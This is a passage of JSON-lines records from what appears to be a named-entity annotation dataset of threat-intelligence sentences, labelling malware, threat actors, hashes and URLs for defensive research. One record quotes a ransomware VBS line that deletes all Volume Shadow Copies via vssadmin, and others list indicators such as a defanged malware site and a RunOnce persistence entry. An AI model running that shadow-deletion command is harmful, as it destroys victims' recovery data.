region.","entities":[{"id":41942,"label":"location","start_offset":9,"end_offset":12},{"id":41944,"label":"location","start_offset":61,"end_offset":64},{"id":41946,"label":"identity","start_offset":91,"end_offset":95},{"id":41947,"label":"location","start_offset":223,"end_offset":229}],"relations":[],"Comments":[]} +{"id":2363,"text":"We continue to collaborate with internal teams like Google Safe Browsing to block domains and IPs used for exploit delivery and industry partners like Apple to mitigate vulnerabilities.","entities":[{"id":47414,"label":"SOFTWARE","start_offset":52,"end_offset":72},{"id":47415,"label":"identity","start_offset":151,"end_offset":156}],"relations":[],"Comments":[]} +{"id":3337,"text":"We have found several connections between BIOPASS RAT and the Winnti Group:","entities":[{"id":10096,"label":"malware","start_offset":42,"end_offset":53},{"id":48945,"label":"threat-actor","start_offset":62,"end_offset":74}],"relations":[{"id":506,"from_id":48945,"to_id":10096,"type":"uses"}],"Comments":[]} +{"id":14263,"text":"Our analysis of the latest Maikspy variants revealed that users contracted the spyware from hxxp:\/\/miakhalifagame[.]com\/, a website that distributes malicious apps (including the 2016 adult game) and connects to its C&C server to upload data from infected devices and machines.","entities":[{"id":48474,"label":"malware","start_offset":27,"end_offset":35},{"id":48475,"label":"URL","start_offset":92,"end_offset":120},{"id":48477,"label":"Infrastucture","start_offset":216,"end_offset":226},{"id":48476,"label":"TIME","start_offset":179,"end_offset":183}],"relations":[{"id":424,"from_id":48474,"to_id":48475,"type":"related-to"},{"id":425,"from_id":48475,"to_id":48477,"type":"related-to"},{"id":426,"from_id":48477,"to_id":48474,"type":"related-to"}],"Comments":[]} +{"id":13061,"text":"With the constant evolution of shell scripts and Linux-based malicious backdoors and agents, it\u2019s not surprising that the creators of Kinsing have kept in step.","entities":[{"id":48893,"label":"malware","start_offset":134,"end_offset":142}],"relations":[],"Comments":[]} +{"id":1606,"text":" If you can\u2019t read the fine print, I don\u2019t blame you.","entities":[],"relations":[],"Comments":[]} +{"id":982,"text":"In version 4.4 of Android (KitKat) Google began preventing apps from capturing SMS messages unless they were defined as the \u201cdefault\u201d SMS app.","entities":[{"id":46479,"label":"identity","start_offset":35,"end_offset":41},{"id":46478,"label":"SOFTWARE","start_offset":18,"end_offset":34}],"relations":[],"Comments":[]} +{"id":402,"text":" During the hunting process, we encountered exploitation attempts that originated from the following IP addresses: Updated June 13, 2022, at 5:30 a.m. PT.","entities":[{"id":44746,"label":"TIME","start_offset":123,"end_offset":153}],"relations":[],"Comments":[]} +{"id":2696,"text":" If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call: Palo Alto Networks has shared these findings, including file samples and indicators of compromise, with our fellow Cyber Threat Alliance members.","entities":[{"id":47932,"label":"identity","start_offset":248,"end_offset":269},{"id":47930,"label":"identity","start_offset":92,"end_offset":99},{"id":47931,"label":"identity","start_offset":133,"end_offset":151}],"relations":[],"Comments":[]} +{"id":2208,"text":"After these functions are loaded, the malware will randomly select an executable from the system32 using the same routine witnessed in the earlier sample.","entities":[{"id":47320,"label":"FILEPATH","start_offset":90,"end_offset":98}],"relations":[],"Comments":[]} +{"id":2589,"text":"In addition, we\u2019ve seen destructive Lapsus$ attacks where the actors got access to an organization\u2019s cloud environment, wiped systems and destroyed over a thousand virtual machines.","entities":[{"id":45605,"label":"threat-actor","start_offset":36,"end_offset":43}],"relations":[],"Comments":[]} +{"id":14144,"text":"We can summarize the correlated indicators in a general form as: Use of Korean language in the system environment of the developers Reuse of multiple TTPs during operation deployments: GNUBoard compromised web sites Multiple malware samples deployed at the same time A similar organization in the deployment architecture Reliance on public services and watering hole attacks to compromised victims Some code reuse, even when the samples are completely different otherwise Working hours for both matches","entities":[{"id":48207,"label":"SOFTWARE","start_offset":190,"end_offset":199}],"relations":[],"Comments":[]} +{"id":9349,"text":" Figure 3.","entities":[],"relations":[],"Comments":[]} +{"id":668,"text":"These scripts can execute immediately as the document opens, without any user interaction (assuming the user has previously enabled macros) and run malicious code on the system.","entities":[],"relations":[],"Comments":[]} +{"id":3122,"text":"In recent research, Palo Alto Networks found attackers were targeting home routers to take control and use them for attacks against other websites that can bring them down.","entities":[{"id":48259,"label":"identity","start_offset":20,"end_offset":38}],"relations":[],"Comments":[]} +{"id":4312,"text":"The contents of the spear phishing email The campaign involves a two-step attack.","entities":[{"id":50110,"label":"attack-pattern","start_offset":20,"end_offset":34},{"id":50111,"label":"attack-pattern","start_offset":65,"end_offset":80}],"relations":[],"Comments":[]} +{"id":1924,"text":"In our previous entry, we already discussed how Confucius used the same Delphi file stealer as Urpage.","entities":[{"id":47048,"label":"threat-actor","start_offset":48,"end_offset":57},{"id":47049,"label":"threat-actor","start_offset":95,"end_offset":101}],"relations":[],"Comments":[]} +{"id":9629,"text":"In our analysis, the macro is obfuscated, character by character, using the decimal ASCII code.","entities":[],"relations":[],"Comments":[]} +{"id":747,"text":"In June, Microsoft introduced a new isolated heap mechanism to solve the usage issue of use-after-free exploitation.","entities":[{"id":44853,"label":"identity","start_offset":9,"end_offset":18},{"id":44854,"label":"attack-pattern","start_offset":88,"end_offset":115}],"relations":[],"Comments":[]} +{"id":9735,"text":"However, we recently observed a few interesting delivery documents similar to the known MuddyWater TTPs.","entities":[],"relations":[],"Comments":[]} +{"id":5426,"text":"The more routers are compromised, the more sources of powerful data collection \u2014 and avenues for further attacks \u2014 become available to attackers.","entities":[],"relations":[],"Comments":[]} +{"id":5502,"text":"Confucius has a miscellany of backdoors: sctrls, ByeBye Shell, remote-access-c3, and sip_telephone, to name a few.","entities":[{"id":51515,"label":"malware","start_offset":85,"end_offset":98},{"id":51512,"label":"malware","start_offset":41,"end_offset":47},{"id":51514,"label":"malware","start_offset":63,"end_offset":79},{"id":51511,"label":"threat-actor","start_offset":0,"end_offset":9},{"id":51513,"label":"malware","start_offset":49,"end_offset":61}],"relations":[],"Comments":[]} +{"id":2179,"text":" If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call: As further information or detections are put into place, Palo Alto Networks will update this publication accordingly.","entities":[{"id":47312,"label":"identity","start_offset":190,"end_offset":208},{"id":47311,"label":"identity","start_offset":92,"end_offset":122}],"relations":[],"Comments":[]} +{"id":2121,"text":"In most cases, this means no authentication is required to exploit the vulnerability.","entities":[],"relations":[],"Comments":[]} +{"id":11784,"text":"In this blog, we explore some of the most notable campaigns we\u2019ve disrupted this year from a different government-backed attacker: APT35, an Iranian group, which regularly conducts phishing campaigns targeting high risk users.","entities":[{"id":36331,"label":"location","start_offset":37,"end_offset":41},{"id":36335,"label":"attack-pattern","start_offset":181,"end_offset":189}],"relations":[],"Comments":[]} +{"id":3387,"text":"Win32.BIOPASS.A","entities":[{"id":49039,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} +{"id":4766,"text":"For Android, through its entire development lifecycle, we subject the products to a rigorous security program.","entities":[{"id":50671,"label":"SOFTWARE","start_offset":4,"end_offset":11}],"relations":[],"Comments":[]} +{"id":12861,"text":"The simulated attackers sent a spear phishing email with a malicious attachment to the manager with the goal of tricking them into opening it, as this technique relies upon user execution.","entities":[{"id":40082,"label":"attack-pattern","start_offset":31,"end_offset":45},{"id":40083,"label":"location","start_offset":121,"end_offset":125},{"id":40084,"label":"attack-pattern","start_offset":173,"end_offset":187}],"relations":[],"Comments":[]} +{"id":1292,"text":" This registry key will ensure an executable that it later downloads is configured to persist across reboots.","entities":[],"relations":[],"Comments":[]} +{"id":853,"text":"And finally because of ways that kernel APC attacks are carried out, it doesn\u2019t leave the usual fingerprints you find after an attack making detection harder still.","entities":[],"relations":[],"Comments":[]} +{"id":10448,"text":"Access","entities":[],"relations":[],"Comments":[]} +{"id":1170,"text":"After nearly as much debate as some of the real research, we\u2019ve whittled the list down to our favorites (For the curious, these are all malware mutexes).","entities":[],"relations":[],"Comments":[]} +{"id":918,"text":" Set UAC = CreateObject(\"Shell.Application\") UAC.ShellExecute \"vssadmin\", \"Delete Shadows \/All \/Quiet\", \"\", \"runas\", 1 On Windows XP, the following dialog box appears to the victim when this script runs, making it fairly apparent that something suspicious is occurring: Figure 8.","entities":[{"id":46440,"label":"SOFTWARE","start_offset":123,"end_offset":133}],"relations":[],"Comments":[]} +{"id":4877,"text":"We encourage any high risk user to enable Advanced Protection and Google Account Level Enhanced Safe Browsing and ensure that all devices are updated.","entities":[{"id":50883,"label":"SOFTWARE","start_offset":66,"end_offset":109},{"id":50884,"label":"SOFTWARE","start_offset":42,"end_offset":61}],"relations":[],"Comments":[]} +{"id":4916,"text":"The attacker live-streamed videos promising cryptocurrency giveaways in exchange for an initial contribution.","entities":[],"relations":[],"Comments":[]} +{"id":9419,"text":"We discovered a new malware family that we have dubbed PuppetLoader.","entities":[{"id":28995,"label":"malware","start_offset":55,"end_offset":67}],"relations":[],"Comments":[]} +{"id":4311,"text":"In this blog entry, we take a look at the lures used by the malicious actor and provide a short analysis of the file stealer used in the campaign, which was launched in early August.","entities":[{"id":50109,"label":"TIME","start_offset":175,"end_offset":181}],"relations":[],"Comments":[]} +{"id":1149,"text":"Both begin with \u201cjhd\u201d.","entities":[],"relations":[],"Comments":[]} +{"id":5237,"text":"This includes Skype, WhatsApp, Facebook, and Twitter, among others.","entities":[{"id":51273,"label":"SOFTWARE","start_offset":31,"end_offset":39},{"id":51271,"label":"SOFTWARE","start_offset":14,"end_offset":19},{"id":51272,"label":"SOFTWARE","start_offset":21,"end_offset":29},{"id":51274,"label":"SOFTWARE","start_offset":45,"end_offset":52}],"relations":[],"Comments":[]} +{"id":3038,"text":"PCs and Macs have firmware and an operating system (Windows, macOS and Linux).","entities":[{"id":48122,"label":"SOFTWARE","start_offset":52,"end_offset":59},{"id":48123,"label":"SOFTWARE","start_offset":61,"end_offset":67},{"id":48124,"label":"SOFTWARE","start_offset":71,"end_offset":76}],"relations":[],"Comments":[]} +{"id":9667,"text":"Figure 10.","entities":[],"relations":[],"Comments":[]} +{"id":721,"text":"You can find the newest release on Atlassian\u2019s download center.","entities":[{"id":46291,"label":"identity","start_offset":35,"end_offset":44}],"relations":[],"Comments":[]} +{"id":4847,"text":"A recent campaign from an Indian hack-for-hire operator was observed targeting an IT company in Cyprus, an education institution in Nigeria, a fintech company in the Balkans and a shopping company in Israel.","entities":[{"id":50812,"label":"location","start_offset":200,"end_offset":206},{"id":50809,"label":"location","start_offset":96,"end_offset":102},{"id":50807,"label":"location","start_offset":26,"end_offset":32},{"id":50808,"label":"identity","start_offset":33,"end_offset":55},{"id":50810,"label":"location","start_offset":132,"end_offset":139},{"id":50811,"label":"location","start_offset":166,"end_offset":173}],"relations":[{"id":1020,"from_id":50808,"to_id":50807,"type":"located-at"},{"id":1021,"from_id":50808,"to_id":50809,"type":"targets"},{"id":1023,"from_id":50808,"to_id":50811,"type":"targets"},{"id":1024,"from_id":50808,"to_id":50812,"type":"targets"},{"id":1022,"from_id":50808,"to_id":50810,"type":"targets"}],"Comments":[]} +{"id":2047,"text":" While the :wtfbbq string is not unique to x4k, by searching for the UTF-16LE version found inside the analyzed HelloXD ransomware samples, we only came across binaries linked to x4k\u2019s infrastructure, providing a fairly strong link between HelloXD and x4k.","entities":[{"id":6089,"label":"malware","start_offset":112,"end_offset":119},{"id":6093,"label":"malware","start_offset":240,"end_offset":247},{"id":47137,"label":"threat-actor","start_offset":43,"end_offset":46},{"id":47139,"label":"threat-actor","start_offset":252,"end_offset":255},{"id":47138,"label":"threat-actor","start_offset":179,"end_offset":182}],"relations":[],"Comments":[]} +{"id":10390,"text":"Figure 2.","entities":[],"relations":[],"Comments":[]} +{"id":7568,"text":" Figure 4. MSI Installer payload that used EXE to MSI converter","entities":[],"relations":[],"Comments":[]} +{"id":2996,"text":"Each and every device will have its own security and privacy settings and it pays to take time to understand those BEFORE you put these to work in your home.","entities":[],"relations":[],"Comments":[]} +{"id":3032,"text":" 12. Patch, Patch and Patch Some More:","entities":[],"relations":[],"Comments":[]} +{"id":2539,"text":"A primary means of infection appears to be through phishing scams, and attackers are constantly upping their game in this area.","entities":[{"id":47730,"label":"attack-pattern","start_offset":51,"end_offset":65}],"relations":[],"Comments":[]} +{"id":8919,"text":"Further investigation showed that MiMi chat installers have been compromised to download and install HyperBro samples for the Windows platform and rshell samples for the Mac OS platform.","entities":[{"id":27575,"label":"location","start_offset":39,"end_offset":43},{"id":27576,"label":"location","start_offset":89,"end_offset":92},{"id":27577,"label":"malware","start_offset":101,"end_offset":109},{"id":27578,"label":"location","start_offset":143,"end_offset":146}],"relations":[],"Comments":[]} +{"id":3136,"text":"These kinds of attacks are called \u201cDistributed Denial of Service\u201d or \u201cDDoS\u201d attacks.","entities":[{"id":48264,"label":"attack-pattern","start_offset":35,"end_offset":64},{"id":48265,"label":"attack-pattern","start_offset":70,"end_offset":74}],"relations":[],"Comments":[]} +{"id":6694,"text":"Last month, we sent 1,755 warnings to users whose accounts were targets of government-backed attackers.","entities":[],"relations":[],"Comments":[]} +{"id":994,"text":" This post describes the scope, associated risks, and implications of this activity.","entities":[],"relations":[],"Comments":[]} +{"id":3554,"text":"We decided to name the potential campaign associated with these IoCs as \u201cKurdishCoder\u201d, based on the property name of an assembly module found in one of the samples.","entities":[{"id":49336,"label":"campaign","start_offset":73,"end_offset":85}],"relations":[],"Comments":[]} +{"id":10272,"text":"Receiving commands and data exfiltration Every 20 minutes, the bot checks for a file in Google Drive.","entities":[{"id":31390,"label":"location","start_offset":19,"end_offset":22},{"id":31391,"label":"TIME","start_offset":41,"end_offset":57}],"relations":[],"Comments":[]} +{"id":732,"text":" To build a custom vulnerability detection rule, open Prisma Cloud and navigate to the following page: name,type,package,minVersionInclusive,maxVersionInclusive,md5 OMIGOD,package,omi,*,1.6.8.0, Palo Alto Networks Azure-based VM- and CN-Series Firewall instances do not use the OMI package and are not vulnerable to the OMI critical vulnerabilities.","entities":[{"id":46318,"label":"identity","start_offset":197,"end_offset":215},{"id":46319,"label":"SOFTWARE","start_offset":216,"end_offset":221},{"id":46321,"label":"SOFTWARE","start_offset":322,"end_offset":325},{"id":46317,"label":"vulnerability","start_offset":166,"end_offset":172},{"id":46316,"label":"SOFTWARE","start_offset":54,"end_offset":66},{"id":46320,"label":"SOFTWARE","start_offset":280,"end_offset":283}],"relations":[],"Comments":[]} +{"id":13542,"text":"Recent telemetry data indicates that the attacks are not being launched via spam anymore.","entities":[{"id":51613,"label":"attack-pattern","start_offset":76,"end_offset":80}],"relations":[],"Comments":[]} +{"id":8047,"text":"The attackers embed javascript into phishing pages that notify them when the page has been loaded.","entities":[{"id":24968,"label":"attack-pattern","start_offset":36,"end_offset":44},{"id":24969,"label":"location","start_offset":63,"end_offset":67},{"id":24970,"label":"location","start_offset":77,"end_offset":81}],"relations":[],"Comments":[]} +{"id":6227,"text":"Additional Findings","entities":[],"relations":[],"Comments":[]} +{"id":14414,"text":"This correlation allows an organization to put the pieces of the attack puzzle together to see the full picture.","entities":[],"relations":[],"Comments":[]} {"id":289,"text":"CISA: Shields Up Technical Guidance 1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da a64c3e0522fad787b95bfb6a30c3aed1b5786e69e88e023c062ec7e5cebf4d3e 3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767 2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf 06086c1da4590dcc7f1e10a6be3431e1166286a9e7761f2de9de79d7fda9c397 Name","entities":[{"id":988,"label":"SHA2","start_offset":37,"end_offset":101},{"id":989,"label":"SHA2","start_offset":102,"end_offset":166},{"id":990,"label":"SHA2","start_offset":167,"end_offset":231},{"id":992,"label":"SHA2","start_offset":297,"end_offset":361},{"id":991,"label":"SHA2","start_offset":232,"end_offset":296},{"id":993,"label":"SHA2","start_offset":362,"end_offset":426},{"id":45984,"label":"identity","start_offset":0,"end_offset":4}],"relations":[],"Comments":[]} -{"id":290,"text":"Hermetica Digital Ltd Thumbprint 1AE7556DFACD47D9EFBE79BE974661A5A6D6D923 Serial Number 0C 48 73 28 73 AC 8C CE BA F8 F0 E1 E8 32 9C EC","entities":[{"id":45985,"label":"identity","start_offset":0,"end_offset":21}],"relations":[],"Comments":[]} -{"id":291,"text":" gcbejm2rcjftouqbxuhimj5oroouqcuxb2my4raxqa7efkz5bd5464id[.]onion","entities":[{"id":44687,"label":"DOMAIN","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} -{"id":292,"text":" Please see the IoCs on GitHub.","entities":[{"id":45987,"label":"SOFTWARE","start_offset":24,"end_offset":30}],"relations":[],"Comments":[]} -{"id":293,"text":"In Alert AA22-011A (updated March 1, 2022), the U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (DHS\/CISA) identifies a selection of vulnerabilities that Russian advanced persistent threat (APT) groups are assessed to have exploited in the past, but recommends that users take action against a much broader list of known exploited vulnerabilities (KEVs).","entities":[{"id":45992,"label":"identity","start_offset":141,"end_offset":145},{"id":45989,"label":"identity","start_offset":48,"end_offset":84},{"id":45990,"label":"identity","start_offset":87,"end_offset":135},{"id":45991,"label":"identity","start_offset":137,"end_offset":140},{"id":45993,"label":"location","start_offset":194,"end_offset":201}],"relations":[],"Comments":[]} -{"id":294,"text":"The cited KEVs and their impacted devices – all of which can be identified using Cortex Xpanse – are: Cortex Xpanse’s ability to index the entire internet helps organizations discover, prioritize, and remediate significant exposures on their attack surfaces – including all of the impacted services listed above.","entities":[{"id":44688,"label":"SOFTWARE","start_offset":81,"end_offset":94},{"id":44689,"label":"SOFTWARE","start_offset":104,"end_offset":117}],"relations":[],"Comments":[]} -{"id":295,"text":"We routinely observe vulnerable devices across the global internet, despite the fact that most of these CVEs are more than two years old.","entities":[],"relations":[],"Comments":[]} -{"id":296,"text":"Beyond Alert AA22-011A, CISA’s overarching guidance for attack surface reduction includes hardening of forward-facing network services, with prioritized patching of KEVs, as documented in Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities (KEV).","entities":[{"id":45994,"label":"identity","start_offset":24,"end_offset":28}],"relations":[],"Comments":[]} -{"id":297,"text":"This directive requires agencies to remediate all vulnerabilities that CISA includes in their KEV catalog based on an assessment that the vulnerabilities “carry significant risk to the federal enterprise.”","entities":[{"id":45995,"label":"identity","start_offset":71,"end_offset":75}],"relations":[],"Comments":[]} -{"id":298,"text":"Learn more and see a detailed workflow example on the Palo Alto Networks SecOps blog, “How Xpanse Can Identify CISA-Identified Known Exploited Vulnerabilities.” ","entities":[{"id":45998,"label":"identity","start_offset":111,"end_offset":115},{"id":45996,"label":"identity","start_offset":54,"end_offset":72},{"id":45997,"label":"SOFTWARE","start_offset":91,"end_offset":97}],"relations":[],"Comments":[]} -{"id":299,"text":"Updated April 1, 2022, at 11 a.m. PT.","entities":[{"id":45999,"label":"TIME","start_offset":8,"end_offset":37}],"relations":[],"Comments":[]} -{"id":300,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":301,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":302,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":303,"text":"Recent events continue to highlight the abuse of remote access applications in the enterprise.","entities":[],"relations":[],"Comments":[]} -{"id":304,"text":"Last Tuesday, Trusteer reported that a new variant of Citadel, which has long relied on VNC to give attackers remote control over systems, began adding new credentials to systems it infects and enabling the standard Windows remote desktop application (RDP).","entities":[{"id":1035,"label":"malware","start_offset":54,"end_offset":61},{"id":46000,"label":"tools","start_offset":88,"end_offset":91},{"id":46001,"label":"tools","start_offset":216,"end_offset":256},{"id":46002,"label":"identity","start_offset":14,"end_offset":22},{"id":46003,"label":"TIME","start_offset":0,"end_offset":12}],"relations":[{"id":142,"from_id":1035,"to_id":46000,"type":"uses"},{"id":143,"from_id":1035,"to_id":46001,"type":"uses"}],"Comments":[]} -{"id":305,"text":"This allows the attacker to maintain control over the system even after the Citadel infection is removed.","entities":[{"id":46004,"label":"malware","start_offset":76,"end_offset":83}],"relations":[],"Comments":[]} -{"id":306,"text":"As the report indicates, using RDP this way also allows the attackers to “fly under the radar” as RDP is commonly used by administrators and often not treated as a threat.","entities":[{"id":44690,"label":"tools","start_offset":98,"end_offset":101},{"id":44691,"label":"tools","start_offset":31,"end_offset":34}],"relations":[],"Comments":[]} -{"id":307,"text":" Later that same week, US-CERT released alert TA14-212A on the Backoff Point of Sale (PoS) malware, which describes how malicious actors used publicly available tools to identify organizations that use remote access applications in an unsafe way.","entities":[{"id":46005,"label":"identity","start_offset":23,"end_offset":30},{"id":46006,"label":"malware","start_offset":63,"end_offset":90}],"relations":[],"Comments":[]} -{"id":308,"text":"This reconnaissance was then leveraged in brute force attacks against credentials, toward unauthorized access, implant installation, and subsequent exfiltration of consumer payment data.","entities":[{"id":1059,"label":"attack-pattern","start_offset":42,"end_offset":53},{"id":46007,"label":"attack-pattern","start_offset":111,"end_offset":131},{"id":46009,"label":"attack-pattern","start_offset":148,"end_offset":185},{"id":46008,"label":"attack-pattern","start_offset":90,"end_offset":109}],"relations":[],"Comments":[]} +{"id":10015,"text":"(m.exe)","entities":[],"relations":[],"Comments":[]} +{"id":480,"text":" They\u2019re put together by Palo Alto Networks Unit 42 threat research team and are meant for you to read and share with your family, friends, and coworkers so you can all be safer and get on with the business of your digital life. Got a topic you want us to write about for you, your friends, or your family?","entities":[{"id":45787,"label":"identity","start_offset":25,"end_offset":43},{"id":45789,"label":"identity","start_offset":44,"end_offset":51},{"id":45790,"label":"identity","start_offset":25,"end_offset":72}],"relations":[],"Comments":[]} +{"id":4826,"text":"COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to send credential phishing emails to targets including government and defense officials, politicians, NGOs and think tanks, and journalists.","entities":[{"id":50774,"label":"location","start_offset":13,"end_offset":20},{"id":50775,"label":"threat-actor","start_offset":65,"end_offset":73},{"id":50773,"label":"threat-actor","start_offset":0,"end_offset":9},{"id":50776,"label":"attack-pattern","start_offset":93,"end_offset":119}],"relations":[{"id":1013,"from_id":50773,"to_id":50774,"type":"located-at"},{"id":1014,"from_id":50775,"to_id":50773,"type":"duplicate-of"}],"Comments":[]} +{"id":2867,"text":"The vulnerability allows an attacker to take full control over the system after a user views a web page in their browser.","entities":[],"relations":[],"Comments":[]} +{"id":277,"text":" As the situation continues to develop, we\u2019ll continue to update our blog with the latest information.","entities":[],"relations":[],"Comments":[]} +{"id":14190,"text":"Alongside the threat from Russian state hackers, Putin may call upon the \u201cpatriotic\u201d reserves of the numerous cybercrime groups operating from within the country.","entities":[],"relations":[],"Comments":[]} +{"id":4279,"text":"Process tree after a successful infection","entities":[],"relations":[],"Comments":[]} +{"id":11916,"text":"In the mid-to-late 2010s, more private companies have joined the marketplace selling these 0-day capabilities.","entities":[],"relations":[],"Comments":[]} +{"id":2964,"text":"Regardless of what holiday(s) you may (or may not) celebrate, the end of the year is a time for people to give and receive some of the latest devices to come on to the market.","entities":[],"relations":[],"Comments":[]} +{"id":13259,"text":"This is carried out to evade antivirus (AV) detection, because wab32res.dll is loaded by a benign file.","entities":[],"relations":[],"Comments":[]} +{"id":14286,"text":" If the user has multiple Twitter accounts, the spyware will use the account where the user is logged in.","entities":[{"id":48499,"label":"SOFTWARE","start_offset":26,"end_offset":34}],"relations":[],"Comments":[]} +{"id":14063,"text":"In both cases, at least one sample received command line arguments.","entities":[],"relations":[],"Comments":[]} +{"id":6529,"text":"\u0645\u06a9\u062a\u0628\u0629 \u0625\u0644\u06a9\u062a\u0631\u0648\u0646\u06cc\u0629.exe f664670044dbd967ff9a5d8d8f345be294053e0bae80886cc275f105d8e7a376 PUA.Win32.RemoteUtilities.A RemoteUtilities remote access software \u0628\u0631\u0646\u0627\u0645\u062c.zip 8bee2012e1f79d882ae635a82b65f88eaf053498a6b268c594b0d7d601b1212f PUA.Win32.RemoteUtilities.A","entities":[{"id":20237,"label":"SHA1","start_offset":20,"end_offset":84},{"id":20238,"label":"malware","start_offset":113,"end_offset":128},{"id":20239,"label":"location","start_offset":129,"end_offset":135},{"id":20240,"label":"SHA2","start_offset":163,"end_offset":227}],"relations":[],"Comments":[]} +{"id":10159,"text":"The future of politically motivated campaigns Rogue political influence campaigns are not likely to go away in the near future.","entities":[{"id":31007,"label":"malware","start_offset":46,"end_offset":51},{"id":31008,"label":"location","start_offset":82,"end_offset":85},{"id":31009,"label":"location","start_offset":90,"end_offset":96}],"relations":[],"Comments":[]} +{"id":12096,"text":"Code signatures on Windows executables provide guarantees about the integrity of a signed executable, as well as information about the identity of the signer.","entities":[],"relations":[],"Comments":[]} +{"id":7383,"text":"We also found the init0 script running; the script cleans out all miners regardless of its origin.","entities":[],"relations":[],"Comments":[]} +{"id":2659,"text":" Organizations in Europe and the U.S. are hit more often by LockBit 2.0 than those in other countries, likely due to the high profitability and insurance payouts.","entities":[{"id":47846,"label":"location","start_offset":33,"end_offset":37},{"id":47847,"label":"threat-actor","start_offset":60,"end_offset":71},{"id":47845,"label":"location","start_offset":18,"end_offset":24}],"relations":[],"Comments":[]} +{"id":4109,"text":"Decrypted configuration file Without knowing the real traffic from the C&C server, we can only speculate on the content of the response based on the receiving function.","entities":[],"relations":[],"Comments":[]} +{"id":7017,"text":"A Look at the Iron Tiger Threat Group","entities":[{"id":21986,"label":"threat-actor","start_offset":14,"end_offset":24}],"relations":[],"Comments":[]} +{"id":5100,"text":"Example Exploit Kit:","entities":[],"relations":[],"Comments":[]} +{"id":5158,"text":"We know that, because of the average time to detect a breach is around 197 days right now and that stat has fluctuated maybe plus or minus 15 days for the last decade.","entities":[],"relations":[],"Comments":[]} +{"id":11610,"text":"While vulnerability research is an important contributor to online safety when that research is used to improve the security of products, vendors stockpiling zero-day vulnerabilities in secret poses a severe risk to the Internet especially if the vendor gets compromised.","entities":[{"id":35587,"label":"tools","start_offset":67,"end_offset":73},{"id":35588,"label":"location","start_offset":116,"end_offset":124},{"id":35590,"label":"location","start_offset":247,"end_offset":253}],"relations":[],"Comments":[]} +{"id":9762,"text":" Figure 5. String of system information collected from the victim\u2019s system","entities":[],"relations":[],"Comments":[]} +{"id":9964,"text":"Figure 1.","entities":[],"relations":[],"Comments":[]} +{"id":36,"text":"Back in the early 2000s, some of the earliest \u201cbotnet herders\u201d made their income by relaying spam emails through infected computers.","entities":[{"id":45768,"label":"attack-pattern","start_offset":93,"end_offset":104},{"id":44575,"label":"TIME","start_offset":12,"end_offset":23}],"relations":[],"Comments":[]} +{"id":4344,"text":"The exclusion list is different for every machine name-username string.","entities":[],"relations":[],"Comments":[]} +{"id":7569,"text":"The actual malicious payload is in the MSI Installer package.","entities":[],"relations":[],"Comments":[]} +{"id":1625,"text":" IncomingSms.java Of course, once users begin receiving the SMS messages, they are likely to unsubscribe from the service they never really wanted.","entities":[{"id":46849,"label":"FILEPATH","start_offset":1,"end_offset":17}],"relations":[],"Comments":[]} +{"id":6793,"text":"Registry: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\MediaPlayer wscript.exe \/\/b \uff05USERPROFILE%\\Documents\\MediaPlayer\\PlayList.vbs","entities":[{"id":21151,"label":"REGISTRYKEY","start_offset":10,"end_offset":89}],"relations":[],"Comments":[]} +{"id":5301,"text":"The details of this communication are covered later in this analysis.","entities":[],"relations":[],"Comments":[]} +{"id":9019,"text":"They could have also been performing exercises in preparation for an attack against similar targets.","entities":[],"relations":[],"Comments":[]} +{"id":1062,"text":" An overlay attack can also be used to create a denial-of-service condition on the device by raising windows on the device that don\u2019t go away.","entities":[{"id":44927,"label":"attack-pattern","start_offset":48,"end_offset":65}],"relations":[],"Comments":[]} +{"id":10102,"text":"Solutions","entities":[],"relations":[],"Comments":[]} +{"id":11716,"text":"Conclusion","entities":[],"relations":[],"Comments":[]} +{"id":3623,"text":"As such, it\u2019s a suitable tactic when an attacker cares less about who falls for it than how many fall for it.","entities":[],"relations":[],"Comments":[]} +{"id":11268,"text":"Terminate process Terminates the specified process if currently running on an endpoint Isolate endpoint Blocks all network activity on an endpoint while the system is being investigated","entities":[],"relations":[],"Comments":[]} +{"id":3027,"text":"A key differentiating feature with smart cars is they often have \u201csmart\u201d lock and ignition systems that are tied to fobs and\/or your devices (like a smartphone).","entities":[],"relations":[],"Comments":[]} +{"id":947,"text":" Taomike is a Chinese company that aims to become the biggest mobile advertisement solution platform in China.","entities":[{"id":46455,"label":"identity","start_offset":1,"end_offset":8},{"id":46456,"label":"location","start_offset":14,"end_offset":21},{"id":46457,"label":"location","start_offset":104,"end_offset":109}],"relations":[{"id":192,"from_id":46455,"to_id":46456,"type":"located-at"}],"Comments":[]} +{"id":580,"text":"Employing effective backup strategies and disaster recovery procedures is important.","entities":[],"relations":[],"Comments":[]} +{"id":3284,"text":" Figure 20.","entities":[],"relations":[],"Comments":[]} +{"id":4968,"text":"This blog is a follow up to our July 2021 post on four 0-day vulnerabilities we discovered in 2021, and details campaigns targeting Android users with five distinct 0-day vulnerabilities: We assess with high confidence that these exploits were packaged by a single commercial surveillance company, Cytrox, and sold to different government-backed actors who used them in at least the three campaigns discussed below.","entities":[{"id":51020,"label":"threat-actor","start_offset":298,"end_offset":304},{"id":51017,"label":"TIME","start_offset":32,"end_offset":41},{"id":51019,"label":"SOFTWARE","start_offset":132,"end_offset":139},{"id":51018,"label":"TIME","start_offset":94,"end_offset":98}],"relations":[],"Comments":[]} +{"id":5300,"text":" After this, a new data packet will be created in memory, which will then be sent to a C&C server.","entities":[],"relations":[],"Comments":[]} +{"id":4357,"text":"We disclosed multiple links between Patchwork and Confucius threat actors in the past, so this came as no surprise to 